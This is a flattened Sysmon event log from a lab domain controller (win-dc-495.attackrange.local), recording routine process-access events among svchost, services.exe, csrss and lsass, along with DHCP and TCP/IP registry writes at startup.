13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.658{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0A00-00000000A301}8481104C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.643{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.643{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x60059c56) 13241300x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x60059a94) 13241300x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x6005954e) 13241300x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x60058e46) 13241300x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.596{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 13241300x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.580{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.580{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.580{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.564{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.564{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 